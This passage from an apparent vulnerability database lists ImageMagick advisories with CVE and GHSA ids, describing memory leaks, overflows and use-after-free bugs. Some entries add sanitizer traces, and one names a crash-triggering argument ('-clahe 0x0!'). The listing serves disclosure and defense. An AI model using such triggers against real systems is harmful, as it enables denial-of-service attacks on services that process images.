Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==1562409==ABORTING ``` ## **Reporter Credit** Google Big Sleep |
CVE-2025-55004
GHSA-cjc8-g9w8-chfw |
| VCID-vguv-n176-k3ch | ImageMagick: Memory leak in read_user_chunk_callback function |
CVE-2017-11310
|
| VCID-vkp6-wh22-eqap | ImageMagick CLAHE : Unsigned underflow and division-by-zero lead to OOB pointer arithmetic and process crash (DoS) A single root cause in the CLAHE implementation — tile width/height becoming zero — produces two distinct but related unsafe behaviors. Vulnerabilities exists in the `CLAHEImage()` function of ImageMagick’s `MagickCore/enhance.c`. 1. Unsigned integer underflow → out-of-bounds pointer arithmetic (OOB): when `tile_info.height == 0`, the expression `tile_info.height - 1` (unsigned) wraps to a very large value; using that value in pointer arithmetic yields a huge offset and OOB memory access (leading to memory corruption, SIGSEGV, or resource exhaustion). 2. **Division/modulus by zero**: where code performs `... / tile_info.width` or `... % tile_info.height` without re-checking for zero, causing immediate division-by-zero crashes under sanitizers or `abort` at runtime. Both behaviors are triggered by the same invalid tile condition (e.g., CLI exact `-clahe 0x0!` or automatic tile derivation `dim >> 3 == 0` for very small images). --- |
CVE-2025-62594
GHSA-wpp4-vqfq-v4hp |
| VCID-w8gb-1r6a-xud3 | ImageMagick: heap-based buffer over-read at MagickCore/pixel-accessor.h in GetPixelChannel |
CVE-2019-13299
|
| VCID-w9dc-fbc3-mudv | ImageMagick: Assertion failure in SetPixelChannelAttributes |
CVE-2017-9499
|
| VCID-wwam-wq1v-1fec | ImageMagick: Memory leak in the WriteOnePNGImage() function |
CVE-2017-11538
|
| VCID-x9y3-z82n-33d8 | ImageMagick: use-after-free in TraceBezier function in MagickCore/draw.c |
CVE-2019-17547
|
| VCID-xbsu-ac6g-53fn | ImageMagick has heap-buffer-overflow via signed integer overflow in WriteUHDRImage when writing UHDR images with large dimensions `WriteUHDRImage` in `coders/uhdr.c` uses `int` arithmetic to compute the pixel buffer size. When image dimensions are large, the multiplication overflows 32-bit `int`, causing an undersized heap allocation followed by an out-of-bounds write. This can crash the process or potentially lead to an out of bounds heap write. ``` ==1575126==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fc382ef3820 at pc 0x5560d31f229f bp 0x7ffe865f9530 sp 0x7ffe865f9520 WRITE of size 8 at 0x7fc382ef3820 thread T0 #0 0x5560d31f229e in WriteUHDRImage coders/uhdr.c:807 ``` |
CVE-2026-25794
GHSA-vhqj-f5cj-9x8h |
| VCID-yah4-bf7d-w7f4 | ImageMagick: heap use-after-free issue in ReplaceXmpValue() function in MagickCore/profile.c. |
CVE-2023-34475
|
| VCID-ypyd-2tg4-xqb1 | ImageMagick: memory leak in TIFFWritePhotoshopLayers function in coders/tiff.c |
CVE-2018-16641
|
| VCID-zpcy-nms7-kuha | ImageMagick has Integer Overflow leading to out of bounds write in SIXEL decoder An integer overflow vulnerability exists in the SIXEL decoer. The vulnerability allows an attacker to perform an out of bounds via a specially crafted mage. |
CVE-2026-28493
GHSA-r39q-jr8h-gcq2 |
| VCID-zsxa-yvp8-93fr | ImageMagick: NULL pointer dereference LoadOpenCLDevices function in MagickCore/opencl.c |
CVE-2017-18253
|